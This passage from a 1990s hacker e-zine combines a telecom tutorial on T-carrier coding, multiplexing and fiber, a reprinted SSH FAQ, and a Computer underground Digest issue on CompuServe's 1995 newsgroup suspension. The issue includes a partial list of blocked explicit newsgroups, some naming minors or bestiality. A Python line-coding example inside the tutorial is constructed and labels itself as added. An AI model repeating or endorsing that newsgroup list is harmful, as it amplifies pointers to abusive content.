line coding procedure used by T-carrier lines. A Bipolar code uses alternating polarties for encoding "1"'s. 
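The bipolar rule above, worked through in Python as an added example that is not part of the original file: an AMI encoder, a receiver that flags any pulse repeating the previous polarity, and the B8ZS substitution (eight zeros sent as 0 0 0 V B 0 V B) that this section goes on to name. The function names, the assumed starting polarity and the sample bit strings are constructed for this illustration.

```python
# Added illustration: AMI (bipolar) line coding, bipolar-violation detection
# and B8ZS zero substitution. All names and sample data are constructed.

ZEROS8 = [0] * 8


def b8zs_pattern(last_pulse):
    """B8ZS replacement for eight zeros: 0 0 0 V B 0 V B.

    V repeats the polarity of the pulse before it (a deliberate violation),
    B is a normal alternating pulse, so the pattern stays DC balanced.
    """
    v = last_pulse
    return [0, 0, 0, v, -v, 0, -v, v]


def ami_encode(bits, b8zs=False, last_pulse=-1):
    """Map bits to line pulses (+1, 0, -1); every "1" flips polarity.

    last_pulse is the polarity of the most recent pulse already on the
    line (assumed negative at start-up for this example).
    """
    bits = list(bits)
    pulses, i = [], 0
    while i < len(bits):
        if b8zs and bits[i:i + 8] == ZEROS8:
            pulses += b8zs_pattern(last_pulse)  # pattern ends on last_pulse
            i += 8
        elif bits[i]:
            last_pulse = -last_pulse
            pulses.append(last_pulse)
            i += 1
        else:
            pulses.append(0)
            i += 1
    return pulses


def ami_decode(pulses, b8zs=False, last_pulse=-1):
    """Return (bits, violations): the recovered bits and the indexes of
    pulses that repeat the previous polarity (bipolar violations)."""
    pulses = list(pulses)
    bits, violations, i = [], [], 0
    while i < len(pulses):
        if b8zs and pulses[i:i + 8] == b8zs_pattern(last_pulse):
            bits += ZEROS8          # substitution recognised, not an error
            i += 8
            continue
        pulse = pulses[i]
        if pulse:
            if pulse == last_pulse:
                violations.append(i)
            last_pulse = pulse
        bits.append(1 if pulse else 0)
        i += 1
    return bits, violations


def longest_zero_run(pulses):
    """Length of the longest run of empty pulse slots (ones-density check)."""
    longest = run = 0
    for pulse in pulses:
        run = run + 1 if pulse == 0 else 0
        longest = max(longest, run)
    return longest


def demo():
    page_bits = [0, 1, 1, 0, 0, 1, 0, 1]    # bit pattern drawn in section 4.4
    line = ami_encode(page_bits)
    print("AMI pulses       :", line, " DC sum:", sum(line))

    noisy = list(line)
    noisy[3] = -1                            # constructed noise pulse
    print("after noise      :", ami_decode(noisy))

    idle = [1] + [0] * 16 + [1]              # constructed: 16 zeros in a row
    coded = ami_encode(idle, b8zs=True)
    print("zero run, AMI    :", longest_zero_run(ami_encode(idle)))
    print("zero run, B8ZS   :", longest_zero_run(coded))
    print("B8ZS-aware rx    :", ami_decode(coded, b8zs=True)[1])
    print("plain AMI rx     :", ami_decode(coded)[1])


if __name__ == "__main__":
    demo()
```

A receiver that does not know about B8ZS reports the substitution's deliberate violations as line errors, which is why both ends of a span have to be optioned for the same line code.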
   > Clear Channel Capability

     Clear Channel Capability is used to describe the capability to
     transmit a DS0 or DS1 level signal which contains any mix of ones
     and zeros, including all zeros. The density requirement is no more
     than 15 zeros. If more than 15 zeros are used then ones must be put
     in or an error will result.

     Due to current signaling and maintenance requirements, only 56 kbps
     of the DS0 signal is available for use by the customer. In order to
     provide 64 kbps Clear Channel Capability (64 CCC), the Bipolar with
     Eight Zero Substitution (B8ZS) is the method recommended as the
     North American Standard. However, interim methods such as
     Fractionally Controlled Multiplexing (FCM), or Zero Byte Time Slot
     Interchange (ZBTSI), can be utilized as an expedient.

   > Bipolar Advantages

      - Simplifies error detection
      - Eliminates DC components
      - Reduces bandwidth requirements

4.4 Digital Wave Forms

[Figure: Comparison of Digital Waveforms. The bit pattern 0 1 1 0 0 1 0 1
drawn against +V, 0V and -V in four forms: Unipolar Non-return to zero,
Unipolar Return to Zero, Bipolar non Return to Zero, Bipolar Return to
Zero.]

4.5 Error Detection

[Figure: Error Detection. A bipolar pulse train, a noise burst on the
line, and the resulting pulse train with the extra pulse marked "Bi-Polar
Violation".]

The error detection technique is very simple. Since each successive "1"
bit is of opposite polarity, an extra pulse will show up as an error.
This error detection technique is called Bipolar Violation Detection.

4.6 Analog Switching with Digital Transmission

[Diagram: Analog Switching with Digital Transmission. Telephone, Local
Office, Toll Office, Toll Office, Local Office, Telephone, with numbered
conversion points 1 to 6 and the bit stream 001010 on the links between
the offices.]

   Key: 1,2,3,4,5 and 6 are Analog/Digital Conversion switching systems
        001010 is the digital bit-stream representation of the analog
        signal

The diagram shows an Analog signal being converted to Digital for
transmission and back to Analog for switching. This configuration causes
additional noise and distortion to be added to the Analog signal.

[Diagram: Digital Switching with Digital Transmission. Telephone, Local
Office, Toll Office, Toll Office, Local Office, Telephone, with conversion
points 1 and 2 at the local offices and the bit stream 01101110 carried
through both toll offices.]

   > Four points of analog/digital conversion have been eliminated from
     the previous example.

   > The digital switch will switch the digital stream directly.
     Therefore, digital to analog conversion is not needed.
   > The introduction of a digital toll office reduces the need for some
     analog/digital conversion.

   > This reduces the cost of providing additional digital transmission
     facilities since no analog/digital conversion will be required at
     the toll office location and this will improve the overall
     transmission.

------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #8 of 12

                    Xenon Foundation presents:

                   *------ the X files ------*

Fall/1993                                                      Issue: 5

              INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
                      Written by: Erik Turbo

                           File: 5 of 6


5. Digital Hierarchy

5.1 Digital Hierarchy Chart

 ____________________________________________________________________________
| LEVEL | BIT RATE     | NO. OF VOICE   | FACILITY  | NUMBER OF | TYPE DSX   |
|       |              | CIRCS. EQUIV.  |           | DIGROUPS  |            |
|-------|--------------|----------------|-----------|-----------|------------|
|       | 1667 Mb/sec  | 24192          | FT "G"    | 1008      | LCIE       |
| DS5   | 564.922Mb/s  | 8064           | LTS 1565  | 336       | LCIE       |
|       | 417 Mb/s     | 6048           | FT "G"    | 252       | LCIE       |
| DS4   | 274.176Mb/s  | 4032           | LIGHTWAVE | 168       | LCIE       |
| DS3C  | 89.472 Mb/s  | 1344           | LIGHTWAVE | 56        | LCIE       |
| DS3   | 44.736 Mb/s  | 672            | T3 OR LT  | 28        | DSX-3/LCIE |
| DS2   | 6.312 Mb/s   | 96             | T2        | 4         | DSX-2      |
| DS1C  | 3.152 Mb/s   | 48             | T1C       | 2         | DSX-1C     |
| DS1   | 1.544 Mb/s   | 24             | T1        | 1         | DSX-1      |
| DS0   | 64 Kb/s      | 1              | --        | --        |            |
|----------------------------------------------------------------------------|
|                           SUB RATES - DATA ONLY                            |
|----------------------------------------------------------------------------|
|       | 56 Kb/s      |                |           |           |            |
|       | 9.6 Kb/s     |                |           |           |            |
|       | 4.8 Kb/s     |                |           |           |            |
|       | 2.4 Kb/s     |                |           |           |            |
|____________________________________________________________________________|

   LCIE = Lightguide Interconnect Equipment

   > The basic unit of the hierarchy is the DS1 signal - which is a 24
     channel, TDM, 1.544 Mb/s signal.

   > The number of voice channels carried by the other digital signal
     levels are direct multiples of the basic DS1 signal.

------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #9 of 12

                    Xenon Foundation presents:

                   *------ the X files ------*

Fall/1993                                                      Issue: 6

              INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
                      Written by: Erik Turbo

                           File: 6 of 6


6. Multiplexing and Fiber Optics

6.1 Space Division Multiplexing (SDM)

Space Division Multiplexing is the bundling of many physically separate
transmission paths into a common path.
The channels are said to be separated in space.

6.2 Frequency Division Multiplexing (FDM)

Frequency Division Multiplexing is the combination of many individual
channels on a common facility. Each individual channel is placed on a
common facility at a different "carrier frequency." The individual
channels are said to be separated in frequency.

6.3 Digital Facility with Multiplexers

[Diagram: Digital Facility with Multiplexers. At each end two channel
banks connect to a MUX/DEMUX, and the two MUX/DEMUX units are joined by
the digital transmission system. Legend: low speed streams on the channel
bank side, high speed stream on the transmission system side, in both
directions.]

The function of a Multiplexer is to combine two or more lower rate bit
streams into one high rate bit stream. At the other end of the
transmission system a Demultiplexer is needed to separate the single high
rate bit stream into two or more lower rate bit streams.

Generally, multiplexers, or Muldems, are required whenever the digital
transmission system operates at a rate other than DS1.

6.7 Fiber Optic Systems

           _____________     ______________     _____________
          | Electrical  |   |              |   |             |
  Input   | to          |   | Transmission |   | Optical to  |   Output
 -------> | Optical     |---| Medium       |---| Electrical  |---------->
          | Transducer  |   |              |   | Transducer  |
          |_____________|   |______________|   |_____________|

                 Basic Fiber Optic System Components

A basic fiber optic system consists of an optical transmitter, a fiber
optic channel, and an optical receiver.
The input is usually DS1, DS1C, DS2, or DS3 electrical signals
multiplexed in the optical transmission system. A transducer converts
the electrical pulses into light pulses.

The light sources include LASER, Light Amplification by Stimulated
Emission of Radiation, and LEDs, Light Emitting Diodes. Most systems
generate a single frequency of light operating upwards in the 1500
nanometers range.

The light source is turned on and off at a fixed pulse rate. The order
of the "on" and "off" signals follows the bit pattern of the incoming
electrical signals.

The optical fibers are pure glass, which provides a low loss transmission
path for the lightwave signals.

Fiber systems used by Telephone Companies are produced by NEC, Rockwell,
AT&T, and Northern Telecom.

6.5 Fiber

Typical Fibers

The fiber consists of a core, cladding, and protective coating.

   > The core is made from germanium-doped silica glass and provides the
     medium for the digital optical signal.

   > The cladding which surrounds the core is also made of silica glass,
     but has different transmission characteristics that bend (refract)
     the signal to stay within the core.

Advantages of Lightguide

   1. The large bandwidth allows much higher channel carrying
      capacities.

   2. Less attenuation allows longer distances between regenerators,
      ranging from 35 to 50 miles.

   3. The small size eases installation and allows multiple use of
      conduit by using innerduct.

------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #10 of 12

                          Secure Shell FAQ
                           Thomas Koenig

Newsgroups: comp.security.unix,comp.security.misc
Subject: SSH (Secure Shell) FAQ - Frequently Asked Questions
Archive-name: computer-security/ssh-faq
Url: http://www.uni-karlsruhe.de/~ig25/ssh-faq/
Posting-frequency: every 14 days

-----BEGIN PGP SIGNED MESSAGE-----

Ssh (Secure Shell) FAQ - Frequently asked questions
by Thomas Koenig, Thomas.Koenig@ciw.uni-karlsruhe.de
$Id: ssh-faq.sgml,v 1.16 1995/12/07 10:54:21 ig25 Exp $

This document is a list of Frequently Asked Questions (plus hopefully
correct answers) about the Secure Shell, ssh.

1. Meta-questions
   1.1. Where do I get this document?
   1.2. Where do I send questions, corrections etc. about this document?

2. Ssh basics
   2.1. What is ssh?
   2.2. Why should I use it?
   2.3. What kinds of attacks does ssh protect against?
   2.4. What kind of attacks does ssh not protect against?
   2.5. How does it work?

3. Obtaining and installing ssh
   3.1. What is the latest version of ssh?
   3.2. What systems does ssh run on?
   3.3. May I legally run ssh?
   3.4. Where can I obtain ssh?
   3.5. How do I install it?
   3.6. Where do I get help?
   3.7. Are there any versions for other operating systems than UNIX?

4. Ssh Applications
   4.1. Can I run backups over ssh?
   4.2. Should I turn encryption off, for performance reasons?
   4.3. Can I use ssh to communicate across a firewall?
   4.4. Can I distribute files with ssh, as with rdist?
   4.5. Can I use ssh to securely connect two subnets across the
        Internet?
   4.6. Can I use ssh to securely forward UDP-based services, such as
        NFS or NIS?
   4.7. Can I forward SGI OpenGL connections over ssh?

5. Problems
   5.1. ssh otherhost xclient & does not work!
   5.2. Ssh fails with "Resource temporarily unavailable" for Solaris
        2.4
   5.3. X11 forwarding does not work for an SCO binary with the iBCS2
        emulator under Linux.
   5.4. Ssh is doing wrong things for multi-homed hosts!
   5.5. Userid swapping is broken under AIX!
   5.6. ssh-keygen dumps core on Alpha OSF!
   5.7. ssh-keygen dumps core on Solaris or SunOS
   5.8. On Linux, compilation aborts with some error message about
        libc.so.4
   5.9. X authorization fails for HP-UX 9.05

6. Miscellaneous
   6.1. Credits


1. Meta-questions

1.1. Where do I get this document?

The latest version of this document is available from
http://www.uni-karlsruhe.de/~ig25/ssh-faq/. It will also be posted, on a
regular basis, to the Usenet newsgroups comp.security.misc,
comp.security.unix, comp.answers and news.answers.

The original SGML file is at
http://www.uni-karlsruhe.de/~ig25/ssh-faq/ssh-faq.sgml.

Also of interest is the ssh home page, at http://www.cs.hut.fi/ssh/.

1.2. Where do I send questions, corrections etc. about this document?

Please send them to the maintainer, Thomas.Koenig@ciw.uni-karlsruhe.de


2. Ssh basics

2.1. What is ssh?

To quote the README file:

   Ssh (Secure Shell) is a program to log into another computer over a
   network, to execute commands in a remote machine, and to move files
   from one machine to another. It provides strong authentication and
   secure communications over insecure channels. It is intended as a
   replacement for rlogin, rsh, and rcp.

2.2. Why should I use it?

The traditional BSD 'r' commands (rsh, rlogin, rcp) are vulnerable to
different kinds of attacks. Somebody who has root access to machines on
the network, or physical access to the wire, can gain unauthorized access
to systems in a variety of ways. It is also possible for such a person to
log all the traffic to and from your system, including passwords (which
ssh never sends in the clear).

The X window system also has a number of severe vulnerabilities. With
ssh, you can create secure remote X sessions which are transparent to the
user. As a side effect, using remote X clients with ssh is more
convenient for users.

Users can continue to use old .rhosts and /etc/hosts.equiv files;
changing over to ssh is mostly transparent for them. If a remote site
does not support ssh, a fallback mechanism to rsh is included.

2.3. What kinds of attacks does ssh protect against?
Ssh protects against:

   o IP spoofing, where a remote host sends out packets which pretend to
     come from another, trusted host. Ssh even protects against a
     spoofer on the local network, who can pretend he is your router to
     the outside.

   o IP source routing, where a host can pretend that an IP packet comes
     from another, trusted host.

   o DNS spoofing, where an attacker forges name server records.

   o Interception of cleartext passwords and other data by intermediate
     hosts.

   o Manipulation of data by people in control of intermediate hosts.

   o Attacks based on listening to X authentication data and spoofed
     connection to the X11 server.

In other words, ssh never trusts the net; somebody hostile who has taken
over the network can only force ssh to disconnect, but cannot decrypt or
play back the traffic, or hijack the connection.

The above only holds if you actually use encryption. Ssh does have an
option to use encryption of type "none"; this is only for debugging
purposes, and should not be used.

2.4. What kind of attacks does ssh not protect against?

Ssh will not help you with anything that compromises your host's security
in some other way. Once an attacker has gained root access to a machine,
he can then subvert ssh, too.

If somebody malevolent has access to your home directory, then security
is nonexistent. This is very much the case if your home directory is
exported via NFS.

2.5. How does it work?

For more extensive information, please refer to the README and RFC files
in the ssh directory. The proposed RFC is also available as an Internet
Draft, as draft-ylonen-ssh-protocol-00.txt.

All communications are encrypted using IDEA or one of several other
ciphers (three-key triple-DES, DES, RC4-128, TSS). Encryption keys are
exchanged using RSA, and data used in the key exchange is destroyed every
hour (keys are not saved anywhere). Every host has an RSA key which is
used to authenticate the host.
Encryption is used to protect against IP-spoofing; public key
authentication is used to protect against DNS and routing spoofing.

The RSA keys are also used to authenticate hosts.


3. Obtaining and installing ssh

3.1. What is the latest version of ssh?

The latest officially released version is 1.2.0. The latest development
version is 1.2.12.

3.2. What systems does ssh run on?

Ssh currently runs on UNIX or related systems. Ports have been successful
to all "mainstream" systems. At present, there are no known working
versions for other operating systems (but see below).

3.3. May I legally run ssh?

Ssh is free software, and can be freely used by anyone for any purpose.

However, in some countries, particularly France, Russia, Iraq, and
Pakistan, it may be illegal to use any encryption at all without a
special permit.

If you are in the United States, you should be aware that, while ssh was
written outside the United States using information publicly available
everywhere, the US Government may consider it a criminal offence to
export this software from the US once it has been imported, including
putting it on a ftp site. Contact the Office of Defence Trade Controls if
you need more information.

The algorithms RSA and IDEA, which are used by ssh, are claimed as
patented in different countries, including the US. Linking against the
RSAREF2 library, which is possible, may or may not make it legal to use
ssh for non-commercial purposes in the US. You may need to obtain
licenses for commercial use of IDEA; ssh can be configured to work
without it. Ssh works perfectly fine without IDEA, however.

For more detail, refer to the file COPYING in the ssh source
distribution.

For information on software patents in general, see the League for
Programming Freedom's homepage at http://lpf.org/.

3.4. Where can I obtain ssh?

The central site for distributing ssh is ftp://ftp.cs.hut.fi/pub/ssh/.
Official releases are PGP-signed, with the key ID

   DCB9AE01 1995/04/24 Ssh distribution key
   Key fingerprint = C8 90 C8 5A 08 F0 F5 FD 61 AF E6 FF CF D4 29 D9

The latest development version is available from
ftp://ftp.cs.hut.fi/pub/ssh/snapshots/.

Ssh is also available via anonymous ftp from the following sites:

   Australia:       ftp://coombs.anu.edu.au/pub/security/tools
   Finland:         ftp://ftp.funet.fi/pub/unix/security/login/ssh
   Germany:         ftp://ftp.cert.dfn.de/pub/tools/net/ssh
   Hungary:         ftp://ftp.kfki.hu/pub/packages/security/ssh
   Ireland:         ftp://odyssey.ucc.ie/pub/ssh
   Poland:          ftp://ftp.agh.edu.pl/pub/security/ssh
   Portugal:        ftp://ftp.ci.uminho.pt/pub/security/ssh
   Russia:          ftp://ftp.kiae.su/unix/crypto
   Slovenia:        ftp://ftp.arnes.si/security/ssh
   United Kingdom:  ftp://ftp.exweb.com/pub/security/ssh
   United States:   ftp://ftp.net.ohio-state.edu/pub/security/ssh
   United States:   ftp://ftp.gw.com/pub/unix/ssh

Some mirrors may not have the most recent snapshots available.

3.5. How do I install it?

Get the file from a site near you, then unpack it with

   gzip -c -d ssh-1.2.12.tar.gz | tar xvf -

then change into the directory ssh-1.2.12, read the file INSTALL, and
follow the directions.

3.6. Where do I get help?

First of all, read the documentation, this document :-) and the ssh home
page, at http://www.cs.hut.fi/ssh/.

If this doesn't help, you can send mail to the mailing list for ssh users
at ssh@clinet.fi. To subscribe, send mail to majordomo@clinet.fi with the
message

   subscribe ssh

in the body of the message.

Before subscribing, you might like to take a look at the archives of the
mailing list, at http://www.cs.hut.fi/ssh/ssh-archive.

3.7. Are there any versions for other operating systems than UNIX?

Heikki Suonsivu (hsu@clinet.fi) and Michael Henits (moi@dio.com) each
offered a US$ 100 reward for the first stable, freely redistributable
version for either Windows or MacOS.
There is a preliminary version for Windows by Cedomir.Igaly@srce.hr,
available from http://public.srce.hr/~cigaly/ssh/; you might want to test
this.

Bernt.Budde@udac.uu.se is working on a Mac port.

A port to VMS, by Mark Martinec (Mark.Martinec@nsc.ijs.si), is being
worked on.


4. Ssh Applications

4.1. Can I run backups over ssh?

Yes. Since ssh is a drop-in replacement for rsh, backup scripts should
continue to work. If you use rdist, see below.

4.2. Should I turn encryption off, for performance reasons?

No; you should keep it turned on, for security reasons.

Today's CPUs are fast enough that performance losses (if any) only are
noticeable for local Ethernet speeds, or faster.

You might want to specify RC4 encryption instead of the default, IDEA,
with -c rc4. At an actual measurement, this dropped sustainable transfer
speed between a P90 and a 486/100 (not the fastest CPUs around) from 386
kb/s (for no encryption) to 318 kb/s.

Across a heavily loaded Ethernet, rc4 encryption together with
compression may actually be faster than using rcp.

If you don't encrypt your sessions, you are vulnerable to all the attacks
which are open on the "r" suite of utilities, and you might as well not
use ssh.

4.3. Can I use ssh to communicate across a firewall?

Yes; you can use TCP forwarding for that, by using its secure TCP
forwarding features.

4.4. Can I distribute files with ssh, as with rdist?

Stock rdist 6.1.0 does not work together with ssh, due to bugs in it. You
can use the Linux version of rdist (which should compile on any system
for which rdist also works), available from
ftp://sunsite.unc.edu/pub/Linux/system/Network/file-transfer/ as
rdist-6.1.0-linuxpl2.tar.gz.

4.5. Can I use ssh to securely connect two subnets across the Internet?

This has been discussed on the ssh mailing list. A proposed solution was
to run ppp with TCP forwarding; however, this has not been implemented
yet.

4.6. Can I use ssh to securely forward UDP-based services, such as NFS
or NIS?
Forwarding UDP packets has been proposed, but has not been implemented.
There are two problems with this:

   o Some UDP-based programs use the IP address of the incoming packet
     and the port it was sent from as a form of authorization.
     Forwarding such packets from local ports would tend to confuse
     these (badly written :-) programs.

   o UDP-based programs usually use a retransmit strategy if they do not
     receive an answer for a predetermined time. This leads to
     inefficiency if packets are forwarded across a reliable connection,
     such as TCP. Somebody would have to implement lossy UDP forwarding
     to avoid this.

4.7. Can I forward SGI OpenGL connections over ssh?

It is not likely that this will be implemented. OpenGL uses a totally
different protocol from X, and at least gld would have to be replaced.


5. Problems

If you don't find your problem listed below, please submit a bug report
to ssh-bugs@clinet.fi, giving full details of

   o Version number of ssh and (if different) sshd
   o What you expected ssh to do
   o What ssh did instead (including all error messages)
   o The system you use (for example, the output of uname -a), and the
     output of config.guess.
   o The compiler you used, plus any compilation flags
   o The output of ssh -v
   o The output of the sshd daemon when run in debug mode, as sshd -d

5.1. ssh otherhost xclient & does not work!

No, it doesn't. Use "ssh -f otherhost xclient" instead, or "ssh -n
otherhost xclient &" if you want a script to be compatible with rsh.

5.2. Ssh fails with "Resource temporarily unavailable" for Solaris 2.4

This is a kernel bug in Solaris. Get the patch 101945-32.

5.3. X11 forwarding does not work for an SCO binary with the iBCS2
emulator under Linux.

You need to set the hostname to the fully qualified domain name for this
to work. Some Linux distributions set the hostname to the first part of
the FQDN only.

5.4. Ssh is doing wrong things for multi-homed hosts!
Check whether gethostbyname() really returns the complete lists of
possible IP addresses (you might, for example, have your system
configured to search /etc/hosts first, which might contain only one of
the IP addresses).

5.5. Userid swapping is broken under AIX!

This is a bug in AIX 3.2.5, reported as APAR IX38941, and fixed by
patches U435001, U427862, U426915, and a few others. Contact your IBM
representative for details.

5.6. ssh-keygen dumps core on Alpha OSF!

For Alpha OSF/1 1.3.2, this is due to a bug in the vendor-supplied
compiler with maximum optimization. Turn off all optimization for
ssh-keygen, or use gcc.

5.7. ssh-keygen dumps core on Solaris or SunOS

This is a bug in gcc 2.7.0, which causes it to generate incorrect code
without optimization. Supply the "-O" or "-O -g" options to gcc when
compiling. Alternatively, upgrade to gcc 2.7.2.

5.8. On Linux, compilation aborts with some error message about
libc.so.4

This is an incorrectly configured Linux system; do a "cd /usr/lib; ln -s
libc.sa libg.sa" as root to remedy this.

5.9. X authorization fails for HP-UX 9.05

This one is known, but a fix is not available yet. If you can supply any
additional data, please send it to ssh-bugs@clinet.fi.

The symptoms, as known so far, are: When the target machine is running
HP-UX 9.05, it is most likely that X authorization fails if the xauth
list produces some lines of output like "this_host:1 this_host:2
this_host:4", with gaps in the lettering. X authorization keeps failing
until a local display number is higher than the highest already present
number. Removing all xauth data does not seem to help.


6. Miscellaneous

6.1. Credits

Most of the credit, of course, goes to Tatu Ylonen for writing ssh and
making it available to the public. I have also used parts of his text
from the documentation accompanying the ssh source distribution. Thanks
also for his corrections for this FAQ.
Also of invaluable help were corrections and additions from members of
the ssh mailing list, by Mark Martinec, Pedro Melo, Michael Soukas,
Adrian Colley, and Kenneth J. Hendrickson.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMMbl5/Bu+cbJcKCVAQHGegQAmwrCuVd44aVYiQZE9/R5NEMOwOZmPVsJ
KVHMsF49tPcA70zl1+KkZji00LtSFQTi9Lw5ts8xMqEmrWtkA9YAVFM7i6FqKApr
yzvFUljNvH7yJFa152f0TXO78fA/yd5EFrNSjDY6gsmf6Nitg488p5fZGyH+X/3U
wbzx2fswdoc=
=szVP
-----END PGP SIGNATURE-----
--
Thomas König, Thomas.Koenig@ciw.uni-karlsruhe.de, ig25@dkauni2.bitnet.
The joy of engineering is to find a straight line on a double
logarithmic diagram.

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #11 of 12

Computer underground Digest    Wed  Jan 3, 1996   Volume 7 : Issue 01
                           ISSN  1004-042X

       Editors: Jim Thomas and Gordon Meyer (TK0JUT2@MVS.CSO.NIU.EDU)
       Archivist: Brendan Kehoe
       Shadow Master: Stanton McCandlish
       Field Agent Extraordinaire: David Smith
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

CONTENTS, #8.01 (Wed, Jan 3, 1996)

File 1--REMINDER - CuD is Changing Servers - RESUBS ARE NECESSARY
File 2-- The CI$ press release
File 3-- List of CIS banned newsgroups
File 4--Compuserve: Adam Dershowitz on Censorship
File 5--Compuserve: Brad Templeton on ClariNet censorship
File 6--WP: Germany Pulls the Shade On CompuServe, Internet
File 7--Fwd: ALERT: Password Security
File 8--Reuters: Telecom Bill Nixed Until Budget Fixed
File 9--(fwd) Postcard to Briberspace (fwd)
File 10--Cu Digest Header Info (unchanged since 16 Dec, 1995)

CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN
THE CONCLUDING FILE AT THE END OF EACH ISSUE.

---------------------------------------------------------------------

Date: Sun, 16 Dec, 1995 16:19:32 CST
From: CuD Moderators
Subject: File 1--REMINDER - CuD is Changing Servers - RESUBS ARE NECESSARY
          *** CuD IS CHANGING SERVERS *** RE-SUB NOW

In about mid-January, Cu Digest will be moving to a new server at
weber.ucsd.edu. We're following the strong consensus of readers and
requiring that, to continue to receive CuD after mid-January, you must
RE-SUBSCRIBE.

Although the move will not take place for a few weeks, you can enter your
subscription before then, so WE STRONGLY URGE YOU TO SUB NOW.

Re-subbing is easy. Just send a message with this in the "Subject:" line

   SUBSCRIBE CU-DIGEST

send it to:

   cu-digest-request@weber.ucsd.edu

Issues will still be sent out from the older server for a few weeks, so
the strategy is to collect the resubs first, and then make the
transition.

If you prefer to access CuD from Usenet, use comp.society.cu-digest

If you prefer archives, you can use the ftp/www site at ftp.eff.org (or
www.eff.org) or the CuD archives at: http://www.soci.niu.edu/~cudigest.

We also hope to have a mail archive set up soon as well.

You can still contact the moderators at:

   cudigest@sun.soci.niu.edu or tk0jut2@mvs.cso.niu.edu

Please *DO NOT* send inquiries to the server at UIUC.

Jim and Gordon

------------------------------

Date: Sat, 30 Dec 1995 09:58:30 -0600
From: Stephen Smith
Subject: File 2-- The CI$ press release

FOR IMMEDIATE RELEASE

CONTACT:  William Giles                 Russ Robinson
          CompuServe Incorporated       CompuServe Incorporated
          614/ 538-4388                 614/ 538-4274

COMPUSERVE(R) SUSPENDS ACCESS TO SPECIFIC INTERNET NEWSGROUPS

COLUMBUS, Ohio, Dec. 28, 1995 -- During the past week, CompuServe
Incorporated temporarily suspended access to more than 200 Internet
newsgroups in response to a direct mandate from the prosecutor's office
in Germany. Each of the newsgroups that was suspended was specifically
identified to CompuServe by the German authorities as illegal under
German criminal law. CompuServe did not select any groups or determine
the nature of the newsgroups that have been impacted by this action.

German government officials, as part of an investigation of illegal material on the Internet, ordered CompuServe to do what was necessary with respect to specified newsgroups in order to comply with German law. German authorities are investigating newsgroups and other Internet content that may contain child pornography, other pornographic material illegal for adults, as well as content that although not illegal for adults is of such an explicit nature that it is illegal for minors.

While access has been suspended, CompuServe continues to work with German authorities to resolve this matter. CompuServe cannot alter the content on the Internet in any way and has only suspended access to the disputed newsgroups through CIS. The issues being investigated in Germany, like those being addressed across the industry, need to remain focused on the individuals and groups placing content on the Internet. CompuServe, as an access provider, is not responsible for the origination or nature of content on the Internet over which it has no creative or editorial control.

The global market is vital to CompuServe. We currently have 500,000 members in Western Europe and anticipate doubling that number in the next year. As the leading global service, CompuServe must comply with the laws of the many countries in which we operate. However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging online industry. CompuServe is investigating ways in which we can restrict user access to selected newsgroups by geographical location.

------------------------------

Date: Sat, 30 Dec 1995 10:04:16 -0600
From: Stephen Smith
Subject: File 3-- List of CIS banned newsgroups

I must admit that I am not familiar with _all_ of these newsgroups, but this is reported to be an accurate list of the groups blocked by CompuServe at the request of the Bavarian prosecutors.

---------- Forwarded message ---------- alt.binaries.pictures.erotica.teen alt.binaries.erotic.senior-citizens alt.binaries.multimedia.erotica alt.binaries.pictures.black.erotic.females alt.binaries.pictures.erotic.anime alt.binaries.pictures.erotic.centerfolds alt.binaries.pictures.erotic.senior-citizens alt.binaries.pictures.erotica alt.binaries.pictures.erotica.amateur.d alt.binaries.pictures.erotica.amateur.female alt.binaries.pictures.erotica.amateur.male alt.binaries.pictures.erotica.animals alt.binaries.pictures.erotica.anime alt.binaries.pictures.erotica.art.pin-up alt.binaries.pictures.erotica.balls alt.binaries.pictures.erotica.bears alt.binaries.pictures.erotica.bestiality alt.binaries.pictures.erotica.black.females alt.binaries.pictures.erotica.black.male alt.binaries.pictures.erotica.blondes alt.binaries.pictures.erotica.bondage alt.binaries.pictures.erotica.breasts alt.binaries.pictures.erotica.butts alt.binaries.pictures.erotica.cartoons alt.binaries.pictures.erotica.cheerleaders alt.binaries.pictures.erotica.d alt.binaries.pictures.erotica.disney alt.binaries.pictures.erotica.female alt.binaries.pictures.erotica.female.anal alt.binaries.pictures.erotica.fetish alt.binaries.pictures.erotica.fetish.feet alt.binaries.pictures.erotica.fetish.hair alt.binaries.pictures.erotica.fetish.latex alt.binaries.pictures.erotica.fetish.leather alt.binaries.pictures.erotica.furry alt.binaries.pictures.erotica.gaymen alt.binaries.pictures.erotica.latina alt.binaries.pictures.erotica.male alt.binaries.pictures.erotica.male.anal alt.binaries.pictures.erotica.midgets alt.binaries.pictures.erotica.oral alt.binaries.pictures.erotica.orientals alt.binaries.pictures.erotica.plushies alt.binaries.pictures.erotica.pornstar alt.binaries.pictures.erotica.pornstars alt.binaries.pictures.erotica.pre-teen alt.binaries.pictures.erotica.pregnant alt.binaries.pictures.erotica.redheads alt.binaries.pictures.erotica.spanking alt.binaries.pictures.erotica.tasteless 
